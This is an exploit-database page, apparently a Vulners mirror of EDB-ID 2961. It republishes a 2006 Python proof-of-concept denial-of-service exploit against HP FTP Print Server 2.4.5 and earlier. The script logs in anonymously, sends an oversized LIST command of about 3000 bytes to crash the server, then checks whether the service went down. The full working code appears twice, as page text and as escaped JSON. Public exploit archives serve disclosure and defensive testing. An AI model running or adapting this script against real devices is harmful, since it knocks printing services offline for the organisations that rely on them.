Search...

Hewlett-Packard FTP Print Server <= 2.4.5 - Buffer Overflow PoC

2006-12-19T00:00:00

ID EDB-ID:2961
Type exploitdb
Reporter Joxean Koret
Modified 2006-12-19T00:00:00

Description

Hewlett-Packard FTP Print Server <= 2.4.5 Buffer Overflow (PoC). Dos exploit for hardware platform

                                        
                                            #!/usr/bin/python

import sys
from ftplib import FTP

print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)"
print "Copyright (c) Joxean Koret"
print

if len(sys.argv) == 1:
    print "Usage: %s &lt;target&gt;" % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]

print "[+] Running attack against " + target

try:
    ftp = FTP(target)
except:
    print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
    sys.exit(0)
try:
    msg = ftp.login() # Login anonymously
    print msg
except:
    print "[!] Error logging anonymously.",sys.exc_info()[1]
    sys.exit(0)

buf = "./A"
iMax = 9

for i in range(iMax):
    buf += buf

print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... "

try:
    print "[+] Please, note that sometimes your connection will not be dropped. "
    ftp.retrlines("LIST " + buf[0:3000])
    print "[!] Exploit doesn't work :("
    print
    sys.exit(0)
except:
    print "[+] Apparently exploit works. Verifying ... "
    print sys.exc_info()[1]

ftp2 = FTP(target)

try:
    msg = ftp2.login()
    print "[!] No, it doesn't work :( "
    print
    print msg
    sys.exit(0)
except:
    print "[+] Yes, it works."
    print sys.exc_info()[1]

# milw0rm.com [2006-12-19]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:2961", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Hewlett-Packard FTP Print Server <= 2.4.5 - Buffer Overflow PoC", "description": "Hewlett-Packard FTP Print Server <= 2.4.5 Buffer Overflow (PoC). Dos exploit for hardware platform", "published": "2006-12-19T00:00:00", "modified": "2006-12-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/2961/", "reporter": "Joxean Koret", "references": [], "cvelist": [], "lastseen": "2016-01-31T17:25:35", "viewCount": 14, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-01-31T17:25:35", "rev": 2}, "dependencies": {"references": [], "modified": "2016-01-31T17:25:35", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/2961/", "sourceData": "#!/usr/bin/python\n\nimport sys\nfrom ftplib import FTP\n\nprint \"Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)\"\nprint \"Copyright (c) Joxean Koret\"\nprint\n\nif len(sys.argv) == 1:\n print \"Usage: %s <target>\" % sys.argv[0]\n sys.exit(0)\n\ntarget = sys.argv[1]\n\nprint \"[+] Running attack against \" + target\n\ntry:\n ftp = FTP(target)\nexcept:\n print \"[!] Can't connect to target\", target, \".\", sys.exc_info()[1]\n sys.exit(0)\ntry:\n msg = ftp.login() # Login anonymously\n print msg\nexcept:\n print \"[!] Error logging anonymously.\",sys.exc_info()[1]\n sys.exit(0)\n\nbuf = \"./A\"\niMax = 9\n\nfor i in range(iMax):\n buf += buf\n\nprint \"[+] Sending buffer of\",len(buf[0:3000]),\"byte(s) ... \"\n\ntry:\n print \"[+] Please, note that sometimes your connection will not be dropped. \"\n ftp.retrlines(\"LIST \" + buf[0:3000])\n print \"[!] Exploit doesn't work :(\"\n print\n sys.exit(0)\nexcept:\n print \"[+] Apparently exploit works. Verifying ... \"\n print sys.exc_info()[1]\n\nftp2 = FTP(target)\n\ntry:\n msg = ftp2.login()\n print \"[!] No, it doesn't work :( \"\n print\n print msg\n sys.exit(0)\nexcept:\n print \"[+] Yes, it works.\"\n print sys.exc_info()[1]\n\n# milw0rm.com [2006-12-19]\n", "osvdbidlist": []}

Hewlett-Packard FTP Print Server &lt;= 2.4.5 - Buffer Overflow PoC

Description

Hewlett-Packard FTP Print Server <= 2.4.5 Buffer Overflow (PoC). Dos exploit for hardware platform

Hewlett-Packard FTP Print Server <= 2.4.5 - Buffer Overflow PoC